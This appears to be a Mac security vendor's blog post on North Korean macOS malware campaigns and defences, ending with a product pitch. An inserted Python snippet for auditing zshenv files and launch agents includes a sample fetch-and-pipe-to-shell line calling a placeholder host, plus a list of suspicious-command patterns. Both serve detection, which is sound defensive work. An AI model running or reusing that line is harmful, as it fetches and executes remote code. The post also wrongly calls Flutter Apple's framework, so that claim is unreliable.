North Korean Hackers Are Targeting Macs — And They're Getting Better at It
I follow Mac security news obsessively. It is quite literally my job. And over the past two years, one trend has stood out above almost everything else: North Korean state-sponsored hacking groups have made macOS a primary target, and their tradecraft is evolving faster than most defenders can keep up.
This is not hypothetical. These groups stole over $2 billion in cryptocurrency in 2025 alone, according to Chainalysis research. The Bybit heist in February 2025, attributed to the Lazarus Group, netted $1.5 billion in a single operation — the largest crypto theft in history. And a significant portion of these attacks specifically target Mac users.
Here is what you need to know.
Why Macs specifically?
The answer is simple: follow the money.
Cryptocurrency companies, blockchain startups, venture capital firms, and fintech companies overwhelmingly use Macs. Walk into any crypto startup in San Francisco, Austin, or Miami and you will see rows of MacBooks. The developers writing smart contracts, the founders holding keys to multisig wallets, the engineers with access to deployment infrastructure — they are almost all on macOS.
North Korean hacking groups figured this out years ago. If your targets use Macs, you build Mac malware. And that is exactly what they have done, developing an entire arsenal of macOS-specific tools that rival anything we have seen from other nation-state actors.
The groups responsible fall under the Lazarus Group umbrella, which is itself part of North Korea's Reconnaissance General Bureau. The subgroup most focused on financial theft and Mac targeting is called BlueNoroff, and they have been exceptionally active.
The malware families you should know about
Over the past three years, security researchers at SentinelOne, Jamf Threat Labs, and Elastic Security Labs have documented a growing list of macOS malware families attributed to DPRK-linked groups. These are the major ones.
RustBucket
First documented by Jamf Threat Labs in April 2023, RustBucket was one of the first clear signals that BlueNoroff was getting serious about macOS. The attack typically began with a PDF lure — the victim would receive a document that appeared to be an investment memo or business proposal. Opening it required a special "PDF viewer" application, which was actually the first-stage dropper called SwiftLoader.
Once running, SwiftLoader would fetch and execute the real payload: a backdoor written in Rust. Elastic Security Labs later identified updated variants with improved persistence and evasion techniques. The malware could collect system information, download additional payloads, and execute arbitrary commands.
What made RustBucket notable was its sophistication. It used multiple stages, multiple programming languages, and legitimate-looking lure documents tailored to each target. This was not mass-market malware. It was precision-targeted espionage tooling built for macOS.
KandyKorn
Discovered by Elastic Security Labs in late 2023, KandyKorn targeted blockchain engineers at cryptocurrency exchanges. The attack chain was elaborate: it began with a social engineering campaign on Discord, where attackers posed as fellow developers and shared what appeared to be a Python-based cryptocurrency arbitrage bot.
Running the "bot" triggered a multi-stage infection chain that eventually deployed KandyKorn, a full-featured backdoor written in C++. KandyKorn could steal files, list directories, upload and download data, kill processes, and execute commands. It also hijacked the victim's legitimate Discord application to maintain persistence — a clever trick that made the malware harder to detect because the malicious activity appeared to come from a trusted app.
ObjCShellz
Reported by Jamf Threat Labs, ObjCShellz is a simpler but effective tool written in Objective-C. It functions as a remote shell, executing commands received from a command-and-control server. It was observed being used alongside RustBucket as part of the same campaign infrastructure, essentially giving the attackers a lightweight way to run commands on compromised Macs without deploying a full backdoor.
Hidden Risk
This is the one that really caught my attention. Documented by SentinelOne's SentinelLABS team in October 2024, the Hidden Risk campaign represented a tactical evolution. Instead of the elaborate social engineering that characterized earlier campaigns, the attackers sent straightforward phishing emails with links to fake cryptocurrency news articles. Titles like "Hidden Risk Behind New Surge of Bitcoin Price" and "Altcoin Season 2.0 — The Hidden Gems to Watch" were designed to appeal to crypto industry workers.
Clicking the link downloaded a malicious application disguised as a PDF. Here is the alarming part: the dropper was code-signed and notarized by Apple. That means it passed Apple's automated security checks and would not trigger Gatekeeper warnings on the victim's Mac.
The campaign also introduced a novel persistence technique, abusing the zshenv configuration file. When you open a terminal on macOS, the system reads zshenv before any other shell configuration. By injecting code there, the malware ensured it would run every time a terminal session started. SentinelLABS noted this was the first time this technique had been observed in the wild.
Flutter-based malware
In late 2024, Jamf Threat Labs discovered DPRK-linked malware samples built using Flutter, Apple's cross-platform UI framework. The use of Flutter provided built-in code obfuscation, making analysis significantly harder. Like Hidden Risk, these samples had been signed and had temporarily passed Apple's notarization process before being revoked.
The attack vectors
If you study these campaigns, clear patterns emerge in how the attacks are delivered.
Fake job offers and coding challenges
This is the most prolific vector, tracked by Palo Alto Networks' Unit 42 as "Contagious Interview." Attackers create fake companies in the blockchain and crypto sectors, post job listings on LinkedIn, GitHub, and freelancer platforms, and then ask applicants to complete coding challenges. The challenge code contains a malicious dependency that installs BeaverTail or InvisibleFerret malware when run. Unit 42 has identified at least 192 malicious packages tied to this campaign.
The FBI issued a specific warning in 2025 about DPRK IT workers using fake identities to get hired at real companies, giving them direct access to internal systems and proprietary code. Hundreds of Fortune 500 companies were affected.
Fake business meetings
The "Prospect Call" campaign, investigated by Daylight Security in 2025, showed another approach. Attackers contacted targets via Telegram, posed as potential business partners, and escalated to a Microsoft Teams call using a lookalike domain (teams.microscall[.]com). During the call, they claimed audio issues and coached the victim into running terminal commands to "fix" the problem. Those commands downloaded and executed malicious binaries that accessed the macOS Keychain and established connections to attacker-controlled infrastructure.
Trojanized applications
Several campaigns have used applications that look and function like legitimate tools — PDF viewers, crypto trading platforms, note-taking apps — but contain hidden malicious payloads. Because some of these were successfully code-signed and notarized, they bypassed the standard macOS security warnings that most users rely on.
What they are after
The primary objective is cryptocurrency. North Korea's crypto theft operations have generated an estimated $6.75 billion to date, according to cumulative tracking by Chainalysis and other blockchain analytics firms. These funds are believed to finance the regime's weapons programs.
But crypto is not the only target. These groups also seek:
- Private keys and wallet seed phrases stored on developer machines
- Code signing certificates that can be used to sign future malware
- Source code for cryptocurrency platforms, which reveals vulnerabilities
- Credentials for cloud services, deployment pipelines, and internal tools
- Intellectual property that can be leveraged for extortion — the FBI documented cases of DPRK IT workers extorting companies by threatening to leak stolen proprietary data
How to protect yourself
If you work in crypto, fintech, blockchain, or venture capital — or honestly, if you just use a Mac — here is what I recommend.
Verify everything you download
Do not run code from job interviews without scrutinizing it first. Do not open "PDF viewers" sent by people you have never met. Do not run terminal commands someone gives you on a video call. This sounds obvious, but these exact tactics have compromised experienced developers at well-known companies.
Check code signatures
Before running any application, right-click it, select "Get Info," and check who signed it. If it is unsigned or signed by an unfamiliar developer, do not run it. Remember, though, that some DPRK malware has passed notarization — so a valid signature is necessary but not sufficient.
Watch for suspicious processes
Malware needs to run as a process. If you know what is normal on your Mac, you can spot what is not. Unexpected processes making network connections, unfamiliar launch agents or daemons, or applications running from unusual paths like /tmp or cache directories are all red flags.
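Two checks for the persistence spots described above (the zshenv injection used in the Hidden Risk campaign, and launch agents or daemons that run from /tmp, cache or download directories), as an added example that is not part of the original post or of CoreLock. The sample zshenv contents and plists are constructed, and the suspicious-pattern lists are assumptions rather than a complete signature set.

```python
"""Audit two macOS persistence spots described in the post: zshenv shell-startup
injection (Hidden Risk) and launch agents that run from unusual paths.
Added example, not CoreLock's code; the sample inputs below are constructed."""
import plistlib
import re

# Directories the post calls red flags for a running program (/tmp, caches, Downloads).
SUSPICIOUS_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/",
                   "/Library/Caches/", "/Downloads/")
# Startup-file commands that fetch or decode something and hand it to a shell (assumed list).
SUSPICIOUS_SHELL = re.compile(
    r"\b(curl|wget|base64\s+(-d|--decode)|eval|nohup|osascript)\b")


def audit_zshenv(text):
    """Return (line number, line) for every non-comment zshenv line that looks injected."""
    hits = []
    for num, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if stripped and not stripped.startswith("#") and SUSPICIOUS_SHELL.search(stripped):
            hits.append((num, stripped))
    return hits


def audit_launch_agent(plist_bytes):
    """Return a list of findings for one LaunchAgent/LaunchDaemon plist."""
    plist = plistlib.loads(plist_bytes)
    findings = []
    program = plist.get("Program") or (plist.get("ProgramArguments") or [""])[0]
    if any(d in program for d in SUSPICIOUS_DIRS):
        findings.append("executable in unusual path: " + program)
    if SUSPICIOUS_SHELL.search(" ".join(plist.get("ProgramArguments", []))):
        findings.append("program arguments fetch or decode code")
    if plist.get("RunAtLoad") and (plist.get("KeepAlive") or plist.get("StartInterval")):
        findings.append("starts at login and is kept alive")
    return findings


# Constructed samples: a ~/.zshenv with an appended loader line, one suspicious
# launch agent and one benign one (a real-looking app bundle path).
ZSHENV_SAMPLE = """# constructed ~/.zshenv
export PATH="$HOME/bin:$PATH"
curl -s http://example.invalid/update | sh &
"""
AGENT_SAMPLE = plistlib.dumps({"Label": "com.example.update",
                               "ProgramArguments": ["/private/tmp/.update", "--silent"],
                               "RunAtLoad": True, "KeepAlive": True})
CLEAN_AGENT = plistlib.dumps({"Label": "com.example.helper",
                              "ProgramArguments": ["/Applications/Helper.app/Contents/MacOS/helper"],
                              "RunAtLoad": True})
```

On a real machine you would feed `audit_zshenv` the contents of /etc/zshenv and ~/.zshenv, and `audit_launch_agent` each plist under the LaunchAgents and LaunchDaemons directories; a hit is a prompt to look closer, not proof of compromise.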
Monitor network connections
DPRK malware phones home. It connects to command-and-control servers to receive instructions and exfiltrate data. Monitoring outbound connections from your Mac can reveal compromises that other detection methods miss.
Keep macOS updated
Apple regularly revokes the code signing certificates used by malware and patches the vulnerabilities these groups exploit. Staying current on macOS security updates is one of the simplest and most effective defenses.
Use dedicated security tooling
The built-in macOS protections — Gatekeeper, XProtect, the Malware Removal Tool — are good but not sufficient against state-sponsored attackers who have demonstrated the ability to bypass notarization. You need something that monitors process behavior, network connections, and persistence mechanisms in real time. That is exactly what I built CoreLock to do: give you continuous visibility into what is actually running on your Mac and alert you when something does not look right.
The bigger picture
What concerns me most is the trajectory. Each new campaign is more polished than the last. The social engineering is more convincing. The malware is more sophisticated. The ability to pass Apple's notarization — repeatedly — shows a level of operational capability that should worry anyone who assumed Macs were inherently safe.
The myth that "Macs don't get viruses" was always oversimplified. But in 2026, with nation-state actors specifically building tools to compromise macOS, it is actively dangerous. North Korean hacking groups have proven that Macs are not just targetable — they are targeted, deliberately and persistently, by some of the most well-resourced threat actors on the planet.
The good news is that awareness is growing. Researchers at SentinelOne, Jamf Threat Labs, Elastic Security Labs, and Unit 42 are doing excellent work documenting these threats. Apple is improving its platform security with every release. And the Mac security community is paying attention.
But ultimately, your security starts with you. Know what is running on your machine. Verify what you download. Be skeptical of unsolicited messages, especially if they involve money, jobs, or running code. These groups are patient, professional, and very good at what they do.
Stay sharp out there.